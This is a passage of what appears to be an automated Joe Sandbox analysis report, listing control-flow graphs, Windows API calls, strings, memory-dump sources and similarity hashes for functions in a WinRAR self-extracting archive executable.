7ff75fbb29a2-7ff75fbb29a7 call 7ff75fbae9a8 744->748 749 7ff75fbb297f-7ff75fbb298c 744->749 745->744 756 7ff75fbb29ac-7ff75fbb29c6 748->756 750 7ff75fbb298e-7ff75fbb2996 749->750 751 7ff75fbb299c-7ff75fbb299e 749->751 750->748 754 7ff75fbb2998-7ff75fbb299a 750->754 751->748 755 7ff75fbb29a0 751->755 754->748 755->748
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepTimeUnmapswprintf
                                                                                                                                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\7zS49DD90FA$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                                                              • API String ID: 980719444-1218550165
                                                                                                                                                                                                              • Opcode ID: 86c0ab46702b9a12567087e493dbcf982fea956f4ace4e4dc3b9ffd70d57bc5f
                                                                                                                                                                                                              • Instruction ID: d87ab621afaa9799bbbf133838a35ee8fee34cc7337f1ee731345da4726e3084
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86c0ab46702b9a12567087e493dbcf982fea956f4ace4e4dc3b9ffd70d57bc5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EB14861E18A82C2FB05FB35E8553F9A3A0FF55744F884135DA8D426A6EF3CE985C720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB3490 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 794 7ff75fbb3490-7ff75fbb3519 call 7ff75fbb30e4 797 7ff75fbb3544-7ff75fbb3561 794->797 798 7ff75fbb351b-7ff75fbb353f call 7ff75fbb33f4 RaiseException 794->798 800 7ff75fbb3576-7ff75fbb357a 797->800 801 7ff75fbb3563-7ff75fbb3574 797->801 806 7ff75fbb3748-7ff75fbb3765 798->806 803 7ff75fbb357d-7ff75fbb3589 800->803 801->803 804 7ff75fbb35aa-7ff75fbb35ad 803->804 805 7ff75fbb358b-7ff75fbb359d 803->805 807 7ff75fbb35b3-7ff75fbb35b6 804->807 808 7ff75fbb3654-7ff75fbb365b 804->808 814 7ff75fbb35a3 805->814 815 7ff75fbb3719-7ff75fbb3723 805->815 812 7ff75fbb35b8-7ff75fbb35cb 807->812 813 7ff75fbb35cd-7ff75fbb35e2 LoadLibraryExA 807->813 810 7ff75fbb366f-7ff75fbb3672 808->810 811 7ff75fbb365d-7ff75fbb366c 808->811 816 7ff75fbb3715 810->816 817 7ff75fbb3678-7ff75fbb367c 810->817 811->810 812->813 819 7ff75fbb3639-7ff75fbb3642 812->819 818 7ff75fbb35e4-7ff75fbb35f7 GetLastError 813->818 813->819 814->804 826 7ff75fbb3740 call 7ff75fbb33f4 815->826 827 7ff75fbb3725-7ff75fbb3736 815->827 816->815 824 7ff75fbb367e-7ff75fbb3682 817->824 825 7ff75fbb36ab-7ff75fbb36be GetProcAddress 817->825 828 7ff75fbb35f9-7ff75fbb360c 818->828 829 7ff75fbb360e-7ff75fbb3634 call 7ff75fbb33f4 RaiseException 818->829 820 7ff75fbb3644-7ff75fbb3647 FreeLibrary 819->820 821 7ff75fbb364d 819->821 820->821 821->808 824->825 831 7ff75fbb3684-7ff75fbb368f 824->831 825->816 830 7ff75fbb36c0-7ff75fbb36d3 GetLastError 825->830 839 7ff75fbb3745 826->839 827->826 828->819 828->829 829->806 835 7ff75fbb36d5-7ff75fbb36e8 830->835 836 7ff75fbb36ea-7ff75fbb3711 call 7ff75fbb33f4 RaiseException call 7ff75fbb30e4 830->836 831->825 837 7ff75fbb3691-7ff75fbb3698 831->837 835->816 835->836 836->816 837->825 841 7ff75fbb369a-7ff75fbb369f 837->841 839->806 841->825 844 7ff75fbb36a1-7ff75fbb36a9 841->844 844->816 844->825
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                              • API String ID: 3432403771-2852464175
                                                                                                                                                                                                              • Opcode ID: 313ed93d5b8346046f408b1bb648d52bc3030ab332f201d74a517b1610a9a249
                                                                                                                                                                                                              • Instruction ID: 8a4679ed10dd555304ae74acb7b8a46bb9298c3e765bee89a71e2e9df55fb7b2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 313ed93d5b8346046f408b1bb648d52bc3030ab332f201d74a517b1610a9a249
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01913926E19B92CAEB40EF75D8446E9B3A5FB08B88B8C4535DE0D07754EF38E845C324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9EFF8 Relevance: 21.6, APIs: 2, Strings: 10, Instructions: 551COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 847 7ff75fb9eff8-7ff75fb9f035 call 7ff75fbb3900 call 7ff75fbb5858 852 7ff75fb9f072-7ff75fb9f082 call 7ff75fba2090 847->852 853 7ff75fb9f037-7ff75fb9f070 GetModuleFileNameW call 7ff75fb9d4e0 call 7ff75fba204c 847->853 857 7ff75fb9f087-7ff75fb9f0af call 7ff75fb9a568 call 7ff75fb9a990 852->857 853->857 864 7ff75fb9f905-7ff75fb9f90c call 7ff75fb9a5b0 857->864 865 7ff75fb9f0b5-7ff75fb9f0c3 857->865 870 7ff75fb9f911-7ff75fb9f92b 864->870 867 7ff75fb9f0c5-7ff75fb9f0e5 call 7ff75fb9f970 * 2 865->867 868 7ff75fb9f0e7-7ff75fb9f121 call 7ff75fbbad50 * 2 865->868 867->868 878 7ff75fb9f124-7ff75fb9f127 868->878 879 7ff75fb9f264-7ff75fb9f286 call 7ff75fb9ae50 call 7ff75fbb82ec 878->879 880 7ff75fb9f12d-7ff75fb9f167 call 7ff75fb9af60 call 7ff75fb9ac90 878->880 879->864 889 7ff75fb9f28c-7ff75fb9f2af call 7ff75fb9ac90 879->889 890 7ff75fb9f232-7ff75fb9f246 call 7ff75fb9ae50 880->890 891 7ff75fb9f16d-7ff75fb9f175 880->891 905 7ff75fb9f2b1-7ff75fb9f2b9 889->905 906 7ff75fb9f2bb-7ff75fb9f2ce call 7ff75fbb82ec 889->906 896 7ff75fb9f24b-7ff75fb9f255 890->896 894 7ff75fb9f1a5-7ff75fb9f1ae 891->894 895 7ff75fb9f177-7ff75fb9f17f 891->895 897 7ff75fb9f1b0-7ff75fb9f1bf 894->897 898 7ff75fb9f1df-7ff75fb9f1e7 894->898 895->894 900 7ff75fb9f181-7ff75fb9f19f call 7ff75fbbb120 895->900 896->878 901 7ff75fb9f25b-7ff75fb9f25e 896->901 897->898 902 7ff75fb9f1c1-7ff75fb9f1c7 897->902 903 7ff75fb9f217-7ff75fb9f220 898->903 904 7ff75fb9f1e9-7ff75fb9f1f1 898->904 900->894 914 7ff75fb9f22e 900->914 901->864 901->879 902->898 909 7ff75fb9f1c9-7ff75fb9f1dd call 7ff75fbbaac0 902->909 903->890 911 7ff75fb9f222 903->911 904->903 910 7ff75fb9f1f3-7ff75fb9f211 call 7ff75fbbb120 904->910 912 7ff75fb9f2f2-7ff75fb9f331 call 7ff75fba2020 call 7ff75fbb82ec 905->912 906->864 919 7ff75fb9f2d4-7ff75fb9f2ef call 7ff75fba3910 call 7ff75fbb82e4 906->919 909->898 924 7ff75fb9f227 909->924 910->864 910->903 911->891 929 7ff75fb9f340-7ff75fb9f35c 912->929 930 7ff75fb9f333-7ff75fb9f33b call 7ff75fbb82e4 912->930 914->890 919->912 924->914 933 7ff75fb9f362-7ff75fb9f36a 929->933 934 7ff75fb9f7dd 929->934 930->864 937 7ff75fb9f375-7ff75fb9f378 933->937 935 7ff75fb9f7e0-7ff75fb9f7e5 934->935 940 7ff75fb9f882-7ff75fb9f8a1 call 7ff75fbb82e4 * 2 935->940 941 7ff75fb9f7eb-7ff75fb9f7ff call 7ff75fbbd8e0 935->941 938 7ff75fb9f675-7ff75fb9f680 937->938 939 7ff75fb9f37e-7ff75fb9f384 937->939 942 7ff75fb9f686-7ff75fb9f690 938->942 943 7ff75fb9f7d5-7ff75fb9f7db 938->943 944 7ff75fb9f392-7ff75fb9f398 939->944 945 7ff75fb9f386-7ff75fb9f38c 939->945 987 7ff75fb9f8c2-7ff75fb9f904 call 7ff75fbbad50 * 2 940->987 988 7ff75fb9f8a3-7ff75fb9f8c0 call 7ff75fb9f970 * 2 940->988 961 7ff75fb9f841-7ff75fb9f87d call 7ff75fbbc0dc call 7ff75fb9f92c 941->961 962 7ff75fb9f801-7ff75fb9f809 941->962 948 7ff75fb9f6f0-7ff75fb9f6f4 942->948 949 7ff75fb9f692-7ff75fb9f698 942->949 943->935 950 7ff75fb9f547-7ff75fb9f557 call 7ff75fba1eac 944->950 951 7ff75fb9f39e-7ff75fb9f3d8 944->951 945->938 945->944 954 7ff75fb9f714-7ff75fb9f717 948->954 955 7ff75fb9f6f6-7ff75fb9f6fa 948->955 956 7ff75fb9f457-7ff75fb9f46c 949->956 957 7ff75fb9f69e-7ff75fb9f6a6 949->957 984 7ff75fb9f65d-7ff75fb9f66f 950->984 985 7ff75fb9f55d-7ff75fb9f58b call 7ff75fba2090 call 7ff75fbbab34 950->985 958 7ff75fb9f3dd-7ff75fb9f3ff call 7ff75fbb82c8 call 7ff75fbbaac0 951->958 966 7ff75fb9f7bd 954->966 967 7ff75fb9f71d-7ff75fb9f732 call 7ff75fbbd8e0 954->967 955->954 963 7ff75fb9f6fc-7ff75fb9f702 955->963 964 7ff75fb9f472 956->964 965 7ff75fb9f36c-7ff75fb9f371 956->965 968 7ff75fb9f6a8-7ff75fb9f6ac 957->968 969 7ff75fb9f6dc 957->969 1011 7ff75fb9f421 958->1011 1012 7ff75fb9f401-7ff75fb9f410 958->1012 961->940 974 7ff75fb9f80f-7ff75fb9f813 962->974 963->956 977 7ff75fb9f708-7ff75fb9f70f 963->977 964->935 965->937 978 7ff75fb9f7c3-7ff75fb9f7ce 966->978 1003 7ff75fb9f774 967->1003 1004 7ff75fb9f734-7ff75fb9f73c 967->1004 980 7ff75fb9f6d5-7ff75fb9f6da 968->980 981 7ff75fb9f6ae-7ff75fb9f6b2 968->981 986 7ff75fb9f6e1-7ff75fb9f6e9 969->986 975 7ff75fb9f815-7ff75fb9f819 974->975 976 7ff75fb9f81b-7ff75fb9f826 974->976 975->976 994 7ff75fb9f828-7ff75fb9f831 975->994 976->974 976->994 978->943 980->986 990 7ff75fb9f6b4-7ff75fb9f6b8 981->990 991 7ff75fb9f6ce-7ff75fb9f6d3 981->991 984->938 985->984 1026 7ff75fb9f591-7ff75fb9f60e call 7ff75fba3b98 call 7ff75fba2020 call 7ff75fba1fc4 call 7ff75fba2020 call 7ff75fbbab74 985->1026 986->948 987->864 988->987 1001 7ff75fb9f6c7-7ff75fb9f6cc 990->1001 1002 7ff75fb9f6ba-7ff75fb9f6be 990->1002 991->986 994->961 999 7ff75fb9f833-7ff75fb9f839 994->999 999->961 1014 7ff75fb9f83b 999->1014 1001->986 1002->977 1010 7ff75fb9f6c0-7ff75fb9f6c5 1002->1010 1007 7ff75fb9f77a-7ff75fb9f7bb call 7ff75fbbc0dc call 7ff75fb9f92c 1003->1007 1015 7ff75fb9f741-7ff75fb9f745 1004->1015 1007->978 1010->986 1022 7ff75fb9f427-7ff75fb9f432 1011->1022 1012->1011 1021 7ff75fb9f412-7ff75fb9f41f 1012->1021 1014->961 1019 7ff75fb9f747-7ff75fb9f74a 1015->1019 1020 7ff75fb9f74c-7ff75fb9f757 1015->1020 1019->1020 1027 7ff75fb9f759-7ff75fb9f762 1019->1027 1020->1015 1020->1027 1021->1022 1022->958 1025 7ff75fb9f434-7ff75fb9f43b 1022->1025 1030 7ff75fb9f477 1025->1030 1031 7ff75fb9f43d-7ff75fb9f44c call 7ff75fba2020 1025->1031 1063 7ff75fb9f610-7ff75fb9f620 1026->1063 1064 7ff75fb9f626-7ff75fb9f639 1026->1064 1027->1007 1029 7ff75fb9f764-7ff75fb9f76a 1027->1029 1029->1007 1037 7ff75fb9f76c-7ff75fb9f772 1029->1037 1030->950 1036 7ff75fb9f47d 1030->1036 1038 7ff75fb9f451 1031->1038 1040 7ff75fb9f482-7ff75fb9f48e 1036->1040 1037->1007 1038->956 1042 7ff75fb9f490-7ff75fb9f493 1040->1042 1043 7ff75fb9f495-7ff75fb9f498 1040->1043 1042->1043 1045 7ff75fb9f49a-7ff75fb9f4a1 1042->1045 1043->1040 1047 7ff75fb9f4a3-7ff75fb9f4ad 1045->1047 1048 7ff75fb9f4ca-7ff75fb9f4f5 call 7ff75fba3b98 1045->1048 1050 7ff75fb9f4b0-7ff75fb9f4b4 1047->1050 1055 7ff75fb9f4f7-7ff75fb9f516 call 7ff75fbb82fc 1048->1055 1056 7ff75fb9f51b-7ff75fb9f542 call 7ff75fb9fda0 1048->1056 1050->1048 1053 7ff75fb9f4b6-7ff75fb9f4c8 1050->1053 1053->1048 1053->1050 1055->1038 1056->1038 1063->1064 1065 7ff75fb9f63f-7ff75fb9f645 1064->1065 1066 7ff75fb9f647-7ff75fb9f64c 1065->1066 1067 7ff75fb9f64e-7ff75fb9f651 1065->1067 1066->1067 1068 7ff75fb9f653 1066->1068 1067->1065 1068->984
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,00007FF75FB9EFD6), ref: 00007FF75FB9F046
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBA3910: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA393D
                                                                                                                                                                                                              • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF75FB9F53D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharFileModuleMultiNameWide_snwprintf
                                                                                                                                                                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                                                                                                              • API String ID: 2679931996-2291855099
                                                                                                                                                                                                              • Opcode ID: 332788c91174e1ade9f6ad45af05d96810b3adf978199a3f29036aa6f4d6963b
                                                                                                                                                                                                              • Instruction ID: 7c6fb55d23ca3c080c2ad5574d5ab5352e170533050cddc7ed4cbaeb65d0e586
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 332788c91174e1ade9f6ad45af05d96810b3adf978199a3f29036aa6f4d6963b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D42BE22A196D2D5EB21BF30C5442FAA365FF04798FC84132DA4D47AA5EF3CEA45C360
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB1890 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                                              • API String ID: 4119318379-2967466578
                                                                                                                                                                                                              • Opcode ID: b3c8d4a133128beca4afda0f7bbe26717fcf8b3fc56fb3d663ebdf430be721a6
                                                                                                                                                                                                              • Instruction ID: c526bac571c6a907780a1ee60d0aba1aa0fa452d443177f3761b67d531a65133
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3c8d4a133128beca4afda0f7bbe26717fcf8b3fc56fb3d663ebdf430be721a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F41DD71B0079286F710AF62E814BEDA761EB41B98F890138DD690BB98CF3DE446CB10
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB7EDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1080 7ff75fbb7edc-7ff75fbb7f1a 1081 7ff75fbb7f20-7ff75fbb7f23 1080->1081 1082 7ff75fbb800b 1080->1082 1083 7ff75fbb7f29 1081->1083 1084 7ff75fbb800d-7ff75fbb8029 1081->1084 1082->1084 1085 7ff75fbb7f2c 1083->1085 1086 7ff75fbb7f32-7ff75fbb7f41 1085->1086 1087 7ff75fbb8003 1085->1087 1088 7ff75fbb7f43-7ff75fbb7f46 1086->1088 1089 7ff75fbb7f4e-7ff75fbb7f6d LoadLibraryW 1086->1089 1087->1082 1090 7ff75fbb7fe5-7ff75fbb7ff4 GetProcAddress 1088->1090 1091 7ff75fbb7f4c 1088->1091 1092 7ff75fbb7f6f-7ff75fbb7f78 GetLastError 1089->1092 1093 7ff75fbb7fc5-7ff75fbb7fda 1089->1093 1090->1087 1098 7ff75fbb7ff6-7ff75fbb8001 1090->1098 1094 7ff75fbb7fb9-7ff75fbb7fc0 1091->1094 1095 7ff75fbb7f7a-7ff75fbb7f8f call 7ff75fbbaac0 1092->1095 1096 7ff75fbb7fa7-7ff75fbb7fb1 1092->1096 1093->1090 1097 7ff75fbb7fdc-7ff75fbb7fdf FreeLibrary 1093->1097 1094->1085 1095->1096 1101 7ff75fbb7f91-7ff75fbb7fa5 LoadLibraryExW 1095->1101 1096->1094 1097->1090 1098->1084 1101->1093 1101->1096
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,00007FF75FBB818E,?,?,?,00007FF75FBB7E80,?,?,00000001,00007FF75FBB5D59), ref: 00007FF75FBB7F61
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF75FBB818E,?,?,?,00007FF75FBB7E80,?,?,00000001,00007FF75FBB5D59), ref: 00007FF75FBB7F6F
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF75FBB818E,?,?,?,00007FF75FBB7E80,?,?,00000001,00007FF75FBB5D59), ref: 00007FF75FBB7F99
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF75FBB818E,?,?,?,00007FF75FBB7E80,?,?,00000001,00007FF75FBB5D59), ref: 00007FF75FBB7FDF
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF75FBB818E,?,?,?,00007FF75FBB7E80,?,?,00000001,00007FF75FBB5D59), ref: 00007FF75FBB7FEB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                              • Opcode ID: 70b29b737c0f87020b2ba131dab067a72e458dfbcb83f2a1695337ea3341b381
                                                                                                                                                                                                              • Instruction ID: e0047824b92d0287c396d615bfb15a7c837cc60738b9c9ea2120f8aa1bea5496
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70b29b737c0f87020b2ba131dab067a72e458dfbcb83f2a1695337ea3341b381
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57319421A1AAC2D6FE15AB3698105F6A294BF44BA0FED0535ED1D47394DF3CE841C328
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAF5C8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                                                                                                                                                              • String ID: ]
                                                                                                                                                                                                              • API String ID: 2347093688-3352871620
                                                                                                                                                                                                              • Opcode ID: 094e488627bc6b151760ef32a4c3d57f862b752fba93407238466997c475bf4c
                                                                                                                                                                                                              • Instruction ID: 2e4810577bbb68d48035ce02dd896591e33c5fba1591ef547359e245adf99131
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 094e488627bc6b151760ef32a4c3d57f862b752fba93407238466997c475bf4c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1116621B0A7C285EA16BB36A6542F9E295AF88BD4FCC4035DDCD07B95DF3DE805C610
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9A990 Relevance: 7.6, APIs: 5, Instructions: 115filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
